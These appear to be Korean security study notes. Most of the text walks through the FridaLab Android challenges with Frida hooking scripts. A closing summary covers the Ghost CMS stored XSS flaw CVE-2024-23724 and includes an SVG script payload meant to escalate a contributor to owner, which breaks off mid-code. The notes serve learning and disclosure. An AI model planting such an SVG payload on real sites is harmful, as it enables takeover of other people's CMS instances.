1. Android Studio + AVD (Pixel 5, API 31, x86_64)
   1. Download Android Studio
2. frida, frida-server (16.2.1)
   1. https://github.com/frida/frida
3. Jadx-gui
   1. https://github.com/skylot/jadx
4. adb
   1. https://developer.android.com/tools/releases/platform-tools?hl=ko
5. Fridalab.apk
   1. https://rossmarks.uk/blog/fridalab/

문제

분석

MainActivity에서 R.id.check의 text 값이 Confirm과 일치하는지 확인해주는 함수를 호출함

조금 찾아보니 리소스 영역을 직접 바꾸는 것은 불가능하다고 하고, 대신 findViewById로 Button 객체를 불러와서 setText 함수를 호출함으로써 내부 텍스트를 변경해줄 수 있다고 함

관련 기법을 잘 몰라서 검색을 좀 해봤는데 MainActivity 인스턴스에 붙어서 findViewById로 내가 원하는 객체의 핸들러를 가져온 뒤, Java.cast(handle, klass) 함수를 호출하여 자바 클래스로 형변환을 하고, setText 함수를 직접 호출할 수 있나 봄

Java.cast는 주어진 객체를 다른 타입으로 캐스팅하는 데 사용됩니다. 이는 주로 findViewById 같은 메서드로 반환된 View 객체를 더 구체적인 뷰 타입, 예를 들어 Button이나 TextView로 캐스팅할 때 사용됩니다.

R.id.check를 더블클릭 해보면 실제 리소스 ID 값을 확인할 수 있음. 이 숫자 값을 findViewById 인자로 넣어주면 View 객체를 불러올 수 있음

이 View 객체를 Button 으로 캐스팅 하기 위해서는 Jadx-gui에서 import 해주는 부분을 참고하면 됨. String 타입은 import 구문에서 안 보이고 기본적으로 외워두는 것이 좋을 듯 (java.lang.String)

그리고 setText 함수를 호출할 때 바로 문자열을 넘겨주면 안 됨. 인자 또한 Java의 String클래스 타입이어야 함. Java.use(’java.lang.String’).$new(’문자열’); 이렇게 넘겨줘야 문자열 타입으로 인식하고 오류가 안 남

var Button = Java.use('android.widget.Button');
var buttonInstance = Java.cast(viewInstance, Button);
if (buttonInstance !== null) {
    var StringClass = Java.use('java.lang.String');
    buttonInstance.setText(StringClass.$new("Confirm"));
} else {
    console.log("Casting failed.");
}

$new는 Java.use로 불러온 프록시 객체로부터 새로운 인스턴스를 생성해주는 함수라고 함. Java.use와의 정확한 차이점은 아래 GPT의 답변을 참고

Java.use와 Java.use().$new는 서로 관련이 있지만, 각기 다른 역할을 수행하는 두 가지 주요 기능입니다. 이 두 기능을 이해하려면 Java의 리플렉션과 객체 생성 방식에 대한 기본적인 이해가 필요합니다. 자세히 설명해 드리겠습니다.

Java.use

Java.use는 Frida의 Java 브리지를 통해 특정 Java 클래스에 접근할 수 있게 해주는 함수입니다. 이 함수는 해당 클래스의 메타데이터를 로드하여, 그 클래스의 인스턴스 메서드, 정적 메서드, 필드 등을 사용할 수 있는 프록시 객체를 반환합니다. 이 프록시 객체를 통해 클래스의 메서드를 호출하거나 필드 값을 변경할 수 있습니다.

예제:

javascriptCopy code
var Button = Java.use('android.widget.Button');
Button.setEnabled(true); // 정적 메서드 호출 (가정)

여기서 Button은 android.widget.Button 클래스의 모든 메서드와 필드에 접근할 수 있는 프록시 객체입니다.

Java.use().$new

Java.use().$new는 Java.use로 얻은 프록시 객체를 통해 해당 클래스의 새로운 인스턴스를 생성하는 함수입니다. Java의 new 키워드와 유사하게 작동하며, 클래스의 생성자를 호출하여 객체를 생성합니다. 이 방법은 주로 생성자에 인자가 필요한 경우 또는 새로운 객체 인스턴스가 필요할 때 사용됩니다.

예제:

javascriptCopy code
var StringClass = Java.use('java.lang.String');
var newString = StringClass.$new("Hello, World!"); // 새 String 인스턴스 생성

여기서 newString은 "Hello, World!" 값을 가진 새로운 Java 문자열 객체입니다.

차이점

• Java.use: 특정 클래스의 정적 구성요소(메서드, 필드)에 접근할 수 있게 해주는 프록시 객체를 반환합니다.
• Java.use().$new: 해당 클래스의 생성자를 호출하여 새로운 인스턴스를 생성합니다. 생성된 인스턴스를 통해 인스턴스 메서드와 필드에 접근할 수 있습니다.

후킹 코드

Java.perform(function () {
    // 1
    var challenge_01 = Java.use('uk.rossmarks.fridalab.challenge_01');
    challenge_01.getChall01Int.implementation = function () {
        send('challenge_01::getChall01Int called');
        var result = this.getChall01Int();
        send('getChall01Int returned: ' + result);
        send('modified result: 1\n');
        return 1; // Or challenge_01.chall01.value = 1
    };

    // 2, 3, 4, 6, 7, 8
    Java.choose('uk.rossmarks.fridalab.MainActivity', {
        onMatch: function (instance) {
            send('Found instance: ' + instance);

            // 2
            send('call MainActivity::chall02\n');
            instance.chall02();

            // 3
            // instance.chall03.implementation = function () {
            //     send('call MainActivity::chall03');
            //     var result = instance.chall03();
            //     send('chall03 returned: ' + result);
            //     send('modified result: true\n');
            //     return true;
            // }

            // 4
            send('call MainActivity::chall04("frida")\n')
            instance.chall04('frida');

            // 6
            var challenge_06 = Java.use('uk.rossmarks.fridalab.challenge_06');
            challenge_06.confirmChall06.implementation = function (i) {
                send('call callenge_06::confirmChall06 with i: ' + i + '\n');
                send('timeStart: ' + this.timeStart.value);
                send('chall06: ' + this.chall06.value);

                send('call challenge_06:confirmChall06 with i: ' + this.chall06.value + '\n');
                var result = this.confirmChall06(this.chall06.value);
                return result;
            };

            send('sleep 10 seconds');
            // Thread.sleep(10);

            send('call MainActivity::chall06');
            instance.chall06(10000);

            // 7
            var challenge_07 = Java.use('uk.rossmarks.fridalab.challenge_07');
            send('brute force check07Pin');
            for (let index = 1000; index < 10000; index++) {
                var result = challenge_07.check07Pin(index.toString());
                if (result) {
                    send('check07Pin result: ' + index.toString() + '\n');
                    instance.chall07(index.toString());
                }
            }

            // 8
            var checkButtonId = instance.findViewById(0x7f07002f);
            send('checkButton id: ' + checkButtonId);
            var checkButton = Java.cast(checkButtonId, Java.use('android.widget.Button'));
            checkButton.setText(Java.use('java.lang.String').$new('Confirm'));
            send('Change check button text value to Confirm \n');
        },
        onComplete: function () { }
    });

    // 3
    var MainActivity = Java.use('uk.rossmarks.fridalab.MainActivity');
    MainActivity.chall03.implementation = function () {
        send('call MainActivity::chall03');
        var result = this.chall03();
        send('chall03 returned: ' + result);
        send('modified result: true\n');
        return true;
    };

    // 5
    MainActivity.chall05.implementation = function (str) {
        send('call MainActivity::chall05 with str: ' + str);
        send('call MainActivity::chall05 with str: frida\n');
        this.chall05('frida');
    };
});

실행 결과

1. Android Studio + AVD (Pixel 5, API 31, x86_64)
   1. Download Android Studio
2. frida, frida-server (16.2.1)
   1. https://github.com/frida/frida
3. Jadx-gui
   1. https://github.com/skylot/jadx
4. adb
   1. https://developer.android.com/tools/releases/platform-tools?hl=ko
5. Fridalab.apk
   1. https://rossmarks.uk/blog/fridalab/

문제

분석

MainActivity 내 chall07() 함수가 존재하고 여기서 check07Pin 함수를 호출해준 뒤 플래그 값을 설정함

    public void chall07(String str) {
        if (challenge_07.check07Pin(str)) {
            this.completeArr[6] = 1;
        } else {
            this.completeArr[6] = 0;
        }
    }

check07Pin은 전달 받은 문자열을 chall07 멤버변수와 비교. 이 값은 setChall07() 함수를 통해 랜덤 값으로 초기화 되는 문자열임

GPT에 물어보니 1000부터 9999까지의 값 중 랜덤한 정수를 뽑아 주는 코드라고 함

/* loaded from: classes.dex */
public class challenge_07 {
    static String chall07;

    public static void setChall07() {
        chall07 = BuildConfig.FLAVOR + (((int) (Math.random() * 9000.0d)) + 1000);
    }

    public static boolean check07Pin(String str) {
        return str.equals(chall07);
    }
}

아무튼 chall07 문자열은 onCreate 함수에서 setChall07 함수가 호출됨으로써 초기화됨

내가 해야 할 것은 check07Pin 함수를 1000부터 9999까지 호출해보면서 true가 반환될 때의 값을 MainActivity의 chall07 인자로 던져주면 됨

후킹 코드

Java.perform(function () {
    // 1
    var challenge_01 = Java.use('uk.rossmarks.fridalab.challenge_01');
    challenge_01.getChall01Int.implementation = function () {
        send('challenge_01::getChall01Int called');
        var result = this.getChall01Int();
        send('getChall01Int returned: ' + result);
        send('modified result: 1\n');
        return 1; // Or challenge_01.chall01.value = 1
    };

    // 2, 3, 4, 6
    Java.choose('uk.rossmarks.fridalab.MainActivity', {
        onMatch: function (instance) {
            send('Found instance: ' + instance);

            // 2
            send('call MainActivity::chall02\n');
            instance.chall02();

            // 3
            // instance.chall03.implementation = function () {
            //     send('call MainActivity::chall03');
            //     var result = instance.chall03();
            //     send('chall03 returned: ' + result);
            //     send('modified result: true\n');
            //     return true;
            // }

            // 4
            send('call MainActivity::chall04("frida")\n')
            instance.chall04('frida');

            // 6
            var challenge_06 = Java.use('uk.rossmarks.fridalab.challenge_06');
            challenge_06.confirmChall06.implementation = function (i) {
                send('call callenge_06::confirmChall06 with i: ' + i + '\n');
                send('timeStart: ' + this.timeStart.value);
                send('chall06: ' + this.chall06.value);

                send('call challenge_06:confirmChall06 with i: ' + this.chall06.value + '\n');
                var result = this.confirmChall06(this.chall06.value);
                return result;
            };

            send('sleep 10 seconds');
            Thread.sleep(10);

            send('call MainActivity::chall06');
            instance.chall06(10000);

            **// 7
            var challenge_07 = Java.use('uk.rossmarks.fridalab.challenge_07');
            send('brute force check07Pin');
            for (let index = 1000; index < 10000; index++) {
                var result = challenge_07.check07Pin(index.toString());
                if (result) {
                    send('check07Pin result: ' + index.toString());
                    instance.chall07(index.toString());
                }
            }**
        },
        onComplete: function () { }
    });

    // 3
    var MainActivity = Java.use('uk.rossmarks.fridalab.MainActivity');
    MainActivity.chall03.implementation = function () {
        send('call MainActivity::chall03');
        var result = this.chall03();
        send('chall03 returned: ' + result);
        send('modified result: true\n');
        return true;
    };

    // 5
    MainActivity.chall05.implementation = function (str) {
        send('call MainActivity::chall05 with str: ' + str);
        send('call MainActivity::chall05 with str: frida\n');
        this.chall05('frida');
    };

});

실행 결과

1. Android Studio + AVD (Pixel 5, API 31, x86_64)
   1. Download Android Studio
2. frida, frida-server (16.2.1)
   1. https://github.com/frida/frida
3. Jadx-gui
   1. https://github.com/skylot/jadx
4. adb
   1. https://developer.android.com/tools/releases/platform-tools?hl=ko
5. Fridalab.apk
   1. https://rossmarks.uk/blog/fridalab/

문제

분석

우선 challenge_06 클래스는 아래와 같음

• startTime: 현재 시간을 timeStart 멤버변수에 저장
• confirmChall06: 애플리케이션이 실행된 후 10초가 경과했는지, 그리고 chall06 변수와 인자로 전달 받은 i가 동일한지 확인
• addChall06: chall06 멤버변수에 인자로 전달 받은 i 값을 더해줌. 만약 9000보다 값이 큰 경우 i값을 그대로 대입

MainActivity의 onCreate 함수에서 startTime 함수를 호출하고, 랜덤 값을 로드한 뒤 addChall06 함수를 두 번 호출함. addChall06 함수가 onCreate 함수 내에서 바로 1번, 그리고 Timer를 활용해 10초 뒤 1번 호출되도록 구현되어 있음

confirmChall06 로직상 실행 후 10초가 경과해야 최소한의 && 조건을 충족할 수 있으므로, chall06 값 또한 바로 가져오지 말고 10초 뒤에 동적으로 가져와야 함 (랜덤 값을 더해주는 방식이어서 정적으로 확인 불가)

그리고 confirmChall06을 호출하는 함수는 MainActivity 내 아래와 같이 존재하는데, xrefs가 없어서 10초 뒤 확인한 chall06 값을 인자로 넣어 직접 호출해 줘야 함

이제 분석한 내용을 바탕으로 코드를 작성하면 됨

후킹 코드

이미 MainActivity에서 생성된 인스턴스를 활용해야 하므로 Java.choose 함수를 이용함

먼저 10초 슬립 후 임의의 숫자 값과 함께 chall06을 호출 → chall06에서 내부적으로 confirmChall06 호출 → chall06 값을 불러와서 그대로 confirmChall06 다시 호출 (임의의 숫자 값을 실제 chall06 값으로 바꿔치기)

Java.perform(function () {
    // 1
    var challenge_01 = Java.use('uk.rossmarks.fridalab.challenge_01');
    challenge_01.getChall01Int.implementation = function () {
        send('challenge_01::getChall01Int called');
        var result = this.getChall01Int();
        send('getChall01Int returned: ' + result);
        send('modified result: 1\n');
        return 1; // Or challenge_01.chall01.value = 1
    };

    // 2, 3, 4, 6
    Java.choose('uk.rossmarks.fridalab.MainActivity', {
        onMatch: function (instance) {
            send('Found instance: ' + instance);

            // 2
            send('call MainActivity::chall02\n');
            instance.chall02();

            // 3
            // instance.chall03.implementation = function () {
            //     send('call MainActivity::chall03');
            //     var result = instance.chall03();
            //     send('chall03 returned: ' + result);
            //     send('modified result: true\n');
            //     return true;
            // }

            // 4
            send('call MainActivity::chall04("frida")\n')
            instance.chall04('frida');

            // 6
            var challenge_06 = Java.use('uk.rossmarks.fridalab.challenge_06');
            challenge_06.confirmChall06.implementation = function (i) {
                send('call callenge_06::confirmChall06 with i: ' + i + '\n');
                send('timeStart: ' + this.timeStart.value);
                send('chall06: ' + this.chall06.value);

                send('call challenge_06:confirmChall06 with i: ' + this.chall06.value + '\n');
                var result = this.confirmChall06(this.chall06.value);
                return result;
            };

            send('sleep 10 seconds');
            Thread.sleep(10);

            send('call MainActivity::chall06');
            instance.chall06(10000);
        },
        onComplete: function () { }
    });

    // 3
    var MainActivity = Java.use('uk.rossmarks.fridalab.MainActivity');
    MainActivity.chall03.implementation = function () {
        send('call MainActivity::chall03');
        var result = this.chall03();
        send('chall03 returned: ' + result);
        send('modified result: true\n');
        return true;
    };

    // 5
    MainActivity.chall05.implementation = function (str) {
        send('call MainActivity::chall05 with str: ' + str);
        send('call MainActivity::chall05 with str: frida\n');
        this.chall05('frida');
    };
});

실행 결과

1. Android Studio + AVD (Pixel 5, API 31, x86_64)
   1. Download Android Studio
2. frida, frida-server (16.2.1)
   1. https://github.com/frida/frida
3. Jadx-gui
   1. https://github.com/skylot/jadx
4. adb
   1. https://developer.android.com/tools/releases/platform-tools?hl=ko
5. Fridalab.apk
   1. https://rossmarks.uk/blog/fridalab/

문제

분석

chall05() 함수는 chall04()와 비슷하게 인자로 들어온 문자열이 ‘frida’인지 검사하고 플래그 값을 세팅함

MainActivity의 onCreate에서 바로 호출되므로 Java.use도 사용 가능할 것으로 보임

후킹 코드

간단하게 Java.use 를 통해 chall05 구현부에서 인자 값을 frida로 호출하게끔 수정하여 해결

Java.perform(function () {
    // 1
    var challenge_01 = Java.use('uk.rossmarks.fridalab.challenge_01');
    challenge_01.getChall01Int.implementation = function () {
        send('challenge_01::getChall01Int called');
        var result = this.getChall01Int();
        send('getChall01Int returned: ' + result);
        send('modified result: 1\n');
        return 1; // Or challenge_01.chall01.value = 1
    };

    // 2, 3, 4
    Java.choose('uk.rossmarks.fridalab.MainActivity', {
        onMatch: function (instance) {
            send('Found instance: ' + instance);

            // 2
            send('call MainActivity::chall02');
            instance.chall02();

            // 3
            // instance.chall03.implementation = function () {
            //     send('call MainActivity::chall03');
            //     var result = instance.chall03();
            //     send('chall03 returned: ' + result);
            //     send('modified result: true\n');
            //     return true;
            // }

            // 4
            send('call MainActivity:chall04("frida")\n')
            instance.chall04('frida');
        },
        onComplete: function () { }
    });

    // 3
    var MainActivity = Java.use('uk.rossmarks.fridalab.MainActivity');
    MainActivity.chall03.implementation = function () {
        send('call MainActivity::chall03');
        var result = this.chall03();
        send('chall03 returned: ' + result);
        send('modified result: true\n');
        return true;
    };

    **// 5
    MainActivity.chall05.implementation = function (str) {
        send('call MainActivity::chall05 with str: ' + str);
        send('call MainActivity::chall05 with str: frida\n');
        this.chall05('frida');
    };**
});

실행 결과

1. Android Studio + AVD (Pixel 5, API 31, x86_64)
   1. Download Android Studio
2. frida, frida-server (16.2.1)
   1. https://github.com/frida/frida
3. Jadx-gui
   1. https://github.com/skylot/jadx
4. adb
   1. https://developer.android.com/tools/releases/platform-tools?hl=ko
5. Fridalab.apk
   1. https://rossmarks.uk/blog/fridalab/

문제

분석

MainActivity 내 chall04 함수. str 인자를 받고 frida와 일치하는지 비교한 뒤 일치하면 플래그 값을 1로 설정해 주고 있음

별도 xrefs가 없어 Challenge 2 때와 같이 직접 호출해 줘야

후킹 코드

처음에 아래와 같이 Java.use를 써서 후킹해보았는데 attach가 잘 안 되었음. 그 이유가 무엇인가 알아보니, chall04 같은 경우 chall03과 달리 어디에서도 호출이 안 되다보니 메모리에 로드되지 않은 상태이기 때문이었음.

// 4
MainActivity.chall04.implementation = function (str) {
    send('call MainActivity::chall04 with: ' + str);
    this.chall04('frida');
}

그래서 onCreate에서 바로 호출되는 chall03 함수에서 chall04를 직접 호출하도록 하면 잘 동작

// 3
var MainActivity = Java.use('uk.rossmarks.fridalab.MainActivity');
MainActivity.chall03.implementation = function () {
    send('call MainActivity::chall03');
    var result = this.chall03();
    this.chall04('frida)')
    send('chall03 returned: ' + result);
    send('modified result: true');
    return true;
};

정리하자면 public/private/static 같은 키워드만으로 갈음할 수 없는 개념인 것 같음

• Java.use의 경우 static 메소드이거나, xrefs가 있는 public 함수처럼 인스턴스가 없는 상황에서도 바로 직접 호출할 수 있는 함수를 후킹할 때 사용 가능
• Java.choose의 경우 private 메소드이거나, xrefs가 없는 public 함수처럼 인스턴스가 있어야만 직접 참조 가능한 함수를 후킹할 때 사용 가능

최종적으로는 아래 코드와 같이 Java.choose 내에서 chall04 함수를 직접 호출해 주었음

Java.perform(function () {
    // 1
    var challenge_01 = Java.use('uk.rossmarks.fridalab.challenge_01');
    challenge_01.getChall01Int.implementation = function () {
        send('challenge_01::getChall01Int called');
        var result = this.getChall01Int();
        send('getChall01Int returned: ' + result);
        send('modified result: 1\n');
        return 1; // Or challenge_01.chall01.value = 1
    };

    // 2, 3, 4
    Java.choose('uk.rossmarks.fridalab.MainActivity', {
        onMatch: function (instance) {
            send('Found instance: ' + instance);

            // 2
            send('call MainActivity::chall02');
            instance.chall02();

            // 3
            // instance.chall03.implementation = function () {
            //     send('call MainActivity::chall03');
            //     var result = instance.chall03();
            //     send('chall03 returned: ' + result);
            //     send('modified result: true\n');
            //     return true;
            // }

            **// 4
            send('call MainActivity:chall04("frida")\n')
            instance.chall04('frida');**
        },
        onComplete: function () { }
    });

    // 3
    var MainActivity = Java.use('uk.rossmarks.fridalab.MainActivity');
    MainActivity.chall03.implementation = function () {
        send('call MainActivity::chall03');
        var result = this.chall03();
        send('chall03 returned: ' + result);
        send('modified result: true\n');
        return true;
    };
});

실행 결과

1. Android Studio + AVD (Pixel 5, API 31, x86_64)
   1. Download Android Studio
2. frida, frida-server (16.2.1)
   1. https://github.com/frida/frida
3. Jadx-gui
   1. https://github.com/skylot/jadx
4. adb
   1. https://developer.android.com/tools/releases/platform-tools?hl=ko
5. Fridalab.apk
   1. https://rossmarks.uk/blog/fridalab/

문제

분석

크게 분석할 것은 없음. MainActivity 내 chall03()이 public 메소드로 정의되어 있고, onCreate 내 onClick에서 바로 호출함

후킹 코드

※ 이제부터 파이썬과 자바스크립트 파일을 별도로 분리

public 메소드이므로 Java.use, Java.choose 두 가지 함수로 호출 가능한데, 어떠한 방식으로든 chall03의 implementation을 수정하여 무조건 true 를 반환하도록 하면 됨

Java.perform(function () {
    // 1
    var challenge_01 = Java.use('uk.rossmarks.fridalab.challenge_01');
    challenge_01.getChall01Int.implementation = function () {
        send('challenge_01::getChall01Int called');
        var result = this.getChall01Int();
        send('myMethod returned: ' + result);
        send('modified result: 1');
        return 1; // Or challenge_01.chall01.value = 1
    };

    // 2, 3
    Java.choose('uk.rossmarks.fridalab.MainActivity', {
        onMatch: function (instance) {
            send('Found instance: ' + instance);

            // 2
            send('call MainActivity::chall02');
            instance.chall02();

            // 3
            // instance.chall03.implementation = function () {
            //     send('call MainActivity::chall03');
            //     var result = instance.chall03();
            //     send('chall03 returned: ' + result);
            //     send('modified result: true');
            //     return true;
            // }
        },
        onComplete: function () { }
    });

    // 3
    var MainActivity = Java.use('uk.rossmarks.fridalab.MainActivity');
    MainActivity.chall03.implementation = function () {
        send('call MainActivity::chall03');
        var result = this.chall03();
        send('chall03 returned: ' + result);
        send('modified result: true');
        return true;
    };
});

실행 결과

1. Android Studio + AVD (Pixel 5, API 31, x86_64)
   1. Download Android Studio
2. frida, frida-server (16.2.1)
   1. https://github.com/frida/frida
3. Jadx-gui
   1. https://github.com/skylot/jadx
4. adb
   1. https://developer.android.com/tools/releases/platform-tools?hl=ko
5. Fridalab.apk
   1. https://rossmarks.uk/blog/fridalab/

문제

분석

우선 apk 내 chall02() 함수를 찾아보니 MainActivity 내에 존재했고, xrefs 를 찍어 보니 없었음. 따라서 MainActivity에서 호출해주는 코드를 직접 만들어야 함

후킹 코드

1차

Challenge 1 때와 같이 Java.use(MainActivity) 후 onCreate 메소드 내에서 직접 호출을 해주면 되지 않을까 싶었는데 안 됨

import frida, sys

def on_message(message, data):
    if message["type"] == "send":
        print(f"[+] {message['payload']}")
    else:
        print(message)

def hook():
    jscode = """
    Java.perform(function() {
        // 1
        var challenge_01 = Java.use("uk.rossmarks.fridalab.challenge_01");
        challenge_01.getChall01Int.implementation = function() {
            send("challenge_01::getChall01Int called");
            var result = this.getChall01Int();
            send("myMethod returned: " + result);
            send("modified result: 1");
            return 1;
        };

        // 2
        var MainActivity = Java.use("uk.rossmarks.fridalab.MainActivity");
        MainActivity.onCreate.implement = function(v) {
            send("MainActivity::onCreate called");
            this.onCreate();
        }
    });
    """

    process = frida.get_usb_device().attach("FridaLab")
    script = process.create_script(jscode)
    script.on("message", on_message)
    script.load()
    sys.stdin.read()

if __name__ == "__main__":
    hook()

2차

찾아 보니 런타임에 올라가 있는 클래스 인스턴스를 후킹할 때는 Java.use가 아닌 Javs.choose를 사용해야 한다고 함 (https://velog.io/@resur/Java.use-Java.choose-차이)

static 메소드가 아닌 경우 instance 메소드에 해당되고, 이 경우 런타임에 로드 된 인스턴스 자체를 후킹 하는 방식으로만 동작함. Java.use와 Java.choose를 사용할 수 있는 경우를 정리하면 아래와 같음

• Java.use: 함수에 static 키워드가 붙어 있거나, 아니면 public으로 선언되어 별도 객체 생성 없이도 직접 호출 가능한 경우
• Java.choose: 함수명에 static 키워드가 붙어 있지 않고, private으 로 선언되어 인스턴스를 통해서만 직접 호출 가능한 경우

Java.use를 사용하면 클래스의 메소드에 직접 접근하여 후킹할 수 있습니다. Frida는 내부적으로 래퍼 객체를 생성하여 메소드 호출을 가로채고 수정할 수 있도록 해줍니다.

하지만 주의해야 할 점은 Java.use를 사용하여 후킹한 메소드는 해당 클래스의 모든 인스턴스에 영향을 줍니다. 즉, 후킹된 메소드는 해당 클래스의 모든 객체에서 동일하게 동작하게 됩니다. 따라서 특정 인스턴스에 대해서만 메소드를 후킹하고 싶다면 Java.choose를 사용하여 해당 인스턴스를 찾아 후킹해야 합니다.

Java.use를 사용한 메소드 후킹은 간단하고 편리하지만, 클래스의 모든 인스턴스에 영향을 줄 수 있다는 점을 고려해야 합니다.

Java.choose 인자는 후킹할 클래스명, 콜백 함수이며 콜백 함수는 onMatch와 onComplete로 구성됨. 여기서 유의해야 할 점은 onMatch, onComplete 모두 정의해 줘야 한다는 것 (onComplete 누락시 에러 발생)

아래 코드를 통해 MainActivity 인스턴스를 후킹하고 chall02() 함수를 직접 호출

import frida, sys

def on_message(message, data):
    if message["type"] == "send":
        print(f"[+] {message['payload']}")
    else:
        print(message)

def hook():
    jscode = """
    Java.perform(function() {
        // 1
        var challenge_01 = Java.use("uk.rossmarks.fridalab.challenge_01");
        challenge_01.getChall01Int.implementation = function() {
            send("challenge_01::getChall01Int called");
            var result = this.getChall01Int();
            send("myMethod returned: " + result);
            send("modified result: 1");
            return 1;
        };

        // 2
        Java.choose("uk.rossmarks.fridalab.MainActivity", {
            onMatch: function(instance) {
                send("Found instance: " + instance);
                send("call MainActivity::chall02");
                instance.chall02();
            },
            onComplete: function() {}
        });
    });
    """

    process = frida.get_usb_device().attach("FridaLab")
    script = process.create_script(jscode)
    script.on("message", on_message)
    script.load()
    sys.stdin.read()

if __name__ == "__main__":
    hook()

실행 결과

참고 사항

아래 코드를 이용해 로드된 모든 클래스를 열거할 수 있음

Java.enumerateLoadedClasses({
    "onMatch" : function(className) {
        console.log(className)
    },
    "onComplete" : function() {}
});

1. Android Studio + AVD (Pixel 5, API 31, x86_64)
   1. Download Android Studio
2. frida, frida-server (16.2.1)
   1. https://github.com/frida/frida
3. Jadx-gui
   1. https://github.com/skylot/jadx
4. adb
   1. https://developer.android.com/tools/releases/platform-tools?hl=ko
5. Fridalab.apk
   1. https://rossmarks.uk/blog/fridalab/

문제

분석

challenge_01 클래스를 보니 아래와 같이 getter 함수 하나가 존재하고 있었음

해당 클래스는 MainActivity의 onClick 함수에서만 사용하며, 아래와 같이 getChall01Int 함수를 통해 값을 불러온 뒤, 1인지 비교하여 1인 경우에만 flag 값을 세팅함

별도 setter 함수가 없어 기본 값으로 세팅되는 것 같고, 아마 0이지 않을까 싶음

해당 클래스의 getChall01Int() 함수를 후킹해서 return 1로 치환해버리면 될 듯

후킹 코드

상위 페이지의 베이스 코드 구조를 기반으로 아래와 같이 후킹 코드를 작성함

import frida, sys

def on_message(message, data):
    if message["type"] == "send":
        print(f"[+] {message['payload']}")
    else:
        print(message)

def hook():
    jscode = """
    Java.perform(function() {
    var MyClass = Java.use("uk.rossmarks.fridalab.challenge_01");

    MyClass.getChall01Int.implementation = function() {
        send("getChall01Int called");
        var result = this.getChall01Int();
        send("myMethod returned: " + result);
        send("modified result: 1");
        return 1;
        };
    });
    """

    process = frida.get_usb_device().attach("FridaLab")
    script = process.create_script(jscode)
    script.on("message", on_message)
    script.load()
    sys.stdin.read()

if __name__ == "__main__":
    hook()

실행 결과

📌 원문: https://rhinosecuritylabs.com/research/cve-2024-23724-ghost-cms-stored-xss/ 포스팅을 보고 공부하며 요약 작성한 글입니다.

취약점 개요

• Rhino Research Team에서 Ghost CMS 애플리케이션의 Stored XSS 취약점을 발견했다.
• 이 취약점을 이용하면 공격자가 Ghost CMS 인스턴스를 탈취하고 소유권을 뺏어올 수 있다.
• 소유권을 가져온 뒤 다른 관리자가 해당 공격자의 계정을 삭제할 수 없게 되며, 전체 액세스 권한을 가질 수 있게 된다.
• 벤더사에서는 해당 취약점을 유효한 벡터로 인식하지 않고 패치하지 않았다. 그래서 취약점을 발견한 Rhino에서 직접 패치를 개발한 뒤 취약점을 공개했다.
• PoC: https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-23724
• Pull Request: https://github.com/TryGhost/Ghost/pull/19646

Ghost CMS란?

• Ghost CMS는 워드프레스와 비슷한 Content Management System 이다.

  Ghost CMS는 오픈 소스의 블로그 및 웹사이트를 만들 수 있는 콘텐츠 관리 시스템입니다. 사용자 친화적인 인터페이스와 세련된 디자인을 제공하며, 개발자들이 자유롭게 커스터마이징할 수 있는 환경을 제공합니다. 또한, SEO 최적화 기능과 소셜 미디어 통합 기능 등을 제공하여 웹사이트 운영을 간편하게 합니다.

CVE-2024-23724: Stored XSS in Profile Image

• Ghost CMS에서는 아래와 같이 5가지의 역할이 존재한다.
  1. Contributors: 로그인 하여 게시물을 작성할 수 있지만 게시할 순 없음
  2. Authors: 새 게시물과 태그를 만들고 게시할 수 있음
  3. Editors: Contributor와 Author를 초대, 관리, 편집할 수 있음
  4. Administrators: 모든 데이터와 설정을 관리할 수 있는 권한을 가짐
  5. Owner: 청구 정보에 액세스 할 수 있는 관리자. (삭제할 수 없음)
• 취약점을 악용하기 위해서는 프로필 이미지 업로드 기능을 활용해야 하며, 공격자는 위 5가지 역할 중 적어도 하나의 권한은 필요하다.

Embedding XSS Payload in SVG

• 프로필 이미지에 SVG 포맷을 허용하는 경우, XSS에 취약할 수 있다.
• PNG나 JPG 같은 기본 이미지 포맷과 달리, SVG는 XML 베이스이고 JavaScript를 포함할 수 있기 때문이다.
• DOMPurify를 통해 SVG 파일을 Sanitize 하면 이러한 리스크를 방지할 수 있다.
• Ghost CMS에서는 DOMPurify와 같은 미티게이션이 적용되어 있지 않아, 악의적으로 조작된 SVG 파일을 프로필 이미지로 업로드하여, 타 사용자가 프로필 이미지를 볼 때 JavaScript가 실행되도록 할 수 있었다.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>

Weaponizing XSS: Ghost CMs instance Takeover

• 가장 낮은 권한인 Contributor에서 가장 높은 권한인 Owner 권한을 탈취할 수 있을지?
• Owner는 소유권을 다른 사용자에게 양도하는 기능이 존재하는데, 양도할 사용자가 이미 관리자여야 한다.
• 그래서 Owner가 악성 SVG를 열람했을 때 아래와 같이 동작하도록 페이로드를 구성했다.
  1. 해당 사용자에게 Administrator 권한을 부여한다.
  2. Owner 권한을 부여한다.
• Owner 권한이 양도되면 공격자는 다른 관리자가 사용할 수 없는 고유한 권한을 갖게 되고, 다른 관리자가 권한을 삭제할 수도 없게 된다.
• 페이로드를 구성하기 위해서는 다음 정보가 필요하다.
  • User ID
  • Username
  • Slug Name
  • User Email
  • Admin Role ID (Ghost CMS 인스턴스마다 랜덤하게 업데이트 됨)
• 위 정보는 인가된 사용자가 http://[Ghost-CMS-Ghost CMS 인스턴스]/ghost/api/admin/users/?include=roles URL에 접속했을 때 얻을 수 있다.

PoC

• http://[Ghost-CMS-Ghost CMS 인스턴스]/ghost/api/admin/users/?include=roles 를 통해 획득한 정보를 토대로, 아래와 같이 SVG 파일을 생성할 수 있다.

  • SVG 파일

      <svg width="100" height="100" xmlns="http://www.w3.org/2000/svg">
        <script type="application/ecmascript">
          // First Request
          const
          url1 = 'http://localhost:3001/ghost/api/admin/users/[User-ID]/?include=roles';
          const data1 = {
            users: [{
              id: '[User-ID]',
              name: '[User-Name]',
              slug: '[Slug-Name]',
              email: '[User-Email]',
              profile_image: '',
              bio: '',
              status: 'active',
              comment_notifications: true,
              free_member_signup_notification: true,
              paid_subscription_started_notification: true,
              paid_subscription_canceled_notification: false,
              mention_notifications: true,
              recommendation_notifications: true,
              milestone_notifications: true,
              donation_notifications: true,
              roles: [{
